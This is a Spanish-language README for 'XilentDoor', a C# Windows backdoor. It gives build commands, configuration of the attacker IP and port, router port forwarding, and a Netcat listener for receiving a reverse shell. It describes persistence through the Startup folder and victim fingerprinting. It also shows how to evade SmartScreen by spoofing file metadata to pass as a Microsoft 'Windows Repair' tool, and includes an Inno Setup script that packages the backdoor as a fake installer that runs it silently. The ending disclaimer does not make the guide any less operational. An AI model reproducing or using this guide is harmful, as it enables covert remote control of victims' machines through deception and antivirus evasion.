XilentDoor es un backdoor escrito en C# orientado a sistemas Windows. Un backdoor es un tipo de malware diseñado para abrir una puerta trasera permanente en el equipo comprometido, permitiendo al atacante acceder y controlar el sistema de forma sigilosa.
Es parte de la familia XilentLocker, XilentRAT y XilentLogger
-
Persistencia: El Backdoor se auto-copia en la ruta
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup, lo que permite que se ejecute automáticamente cada vez que el sistema se reinicie.
-
Fingerprinting: Recopila información básica del sistema donde se ejecuta el backdoor. Esta funcionalidad se suele usar para identificar la máquina víctima o confirmar la infección exitosa antes de enviar datos al atacante.
-
(1) Tener instalado el SDK de .NET: https://dotnet.microsoft.com/en-us/download
-
(2) Compilar el backdoor con los siguientes comandos:
dotnet build -c Release <- el .exe se guarda en XilentDoor\bin\Release\net6.0\XilentDoor.exe
dotnet run <- Ejecuta el Backdoor
Con el siguiente comando compilan el Backdoor con todas las dependencias, significa que podrán ejecutar el programa en cualquier directorio:
dotnet publish -c Release -r win-x64 --self-contained true /p:PublishSingleFile=true /p:IncludeAllContentForSelfExtract=true
- (3) En el método Main (archivo
Program.cs) modifican la IP y puerto del listener (máquina atacante).
Para infectar remotamente un sistema Windows, es necesario configurar un puerto en modo escucha en el router. Esto se puede lograr accediendo al panel de administración del router, disponible en http://192.168.1.1. En la casilla de LAN Host es la IP local de la máquina atacante (Kali Linux) y el puerto puede ser aleatorio.
En Program.cs ingresan su IP pública y puerto, y compilan el programa a .EXE.
En la máquina atacante (Kali Linux), configure Netcat para escuchar en el puerto previamente seleccionado. Si el usuario ejecuta el programa, se establecerá una conexión y obtendrá acceso a una shell remota.
En las pruebas realizadas con el backdoor, los antivirus externos no detectan su presencia. Sin embargo, Microsoft Defender SmartScreen actúa como un filtro reputacional, bloqueando ejecutables nuevos, no firmados o con poca distribución.
Para evadir SmartScreen, podemos firmar el ejecutable con un certificado digital (lo ideal es adquirir un certificado de firma de código, Code Signing Certificate) o bien empaquetar el instalador (.EXE/.MSI) y modificar sus metadatos para reducir su detectabilidad.
Primero debemos de modificar los metadatos y para ello podemos usar herramientas como Resource Hacker o Recedit.
rcedit-x64.exe XilentDoor.exe --set-version-string "CompanyName" "Microsoft Corporation" --set-version-string "ProductName" "Windows Tool" --set-version-string "FileDescription" "Windows Repair" --set-file-version "1.3.5.0" --set-product-version "1.2.5.0" --set-icon "icon.ico"
| PARÁMETRO | DESCRIPCIÓN |
|---|---|
| CompanyName | Nombre de la empresa/organización falsa. |
| ProductName | Nombre del producto. |
| FileDescription | Descripción que aparece en el taskmanager (Administrador de Tareas). |
| --set-file-version | Versión técnica del archivo. |
| --set-product-version | Versión del producto general. |
| --set-icon | Icono visual. |
Luego empaquetaremos el .EXE/.MSI en un installer utilizando herramientas como Inno SetUp o NSIS. En mi caso utilizaré Inno, luego de escribir los metadatos del .EXE debemos de crear un script con el nombre instalador.iss con el siguiente contenido:
[Setup]
AppName=Windows Tool
AppVersion=1.3.5.0
DefaultDirName={localappdata}\WindowsRepair
DisableProgramGroupPage=yes
OutputDir=.
OutputBaseFilename=installer_windows_tool
Compression=lzma
SolidCompression=yes
[Files]
Source: "C:\Users\Usuario\Desktop\MALWARE\Evasion\XilentDoor.exe"; DestDir: "{app}"; Flags: ignoreversion
[Icons]
Name: "{userstartup}\Windows Repair"; Filename: "{app}\XilentDoor.exe"; IconFilename: "{app}\XilentDoor.exe"
[Run]
Filename: "{app}\XilentDoor.exe"; Description: "Ejecutando Windows Repair..."; Flags: nowait postinstall skipifsilent| PARÁMETRO | DESCRIPCIÓN |
|---|---|
| AppName y AppVersion | Nombre visible del programa falso. |
| DefaultDirName | Instala en AppData\WindowsAudio (poco sospechoso). |
| OutputDir | El .exe del instalador se guardará en el mismo directorio. |
| Files | Copia XilentDoor.exe a la carpeta destino. |
| Icons | Crea una entrada en Inicio → Ejecutar al iniciar sesión. |
| Run | Ejecuta el backdoor automáticamente tras la instalación. |
En el menu de Inno le damos a Build -> Compile.
Nos dejará el instalador "legítimo", pero detrás se ejecutará el backdoor y en el Administrador de Tareas aparecerá como una herramienta de reparación de Windows.
Correo de contacto:
Caution
Cualquier uso indebido de este software será de exclusiva responsabilidad del usuario final, y no del autor. Este proyecto tiene como objetivo inicial demostrar las capacidades de C# como lenguaje para el desarrollo de malware en entornos controlados.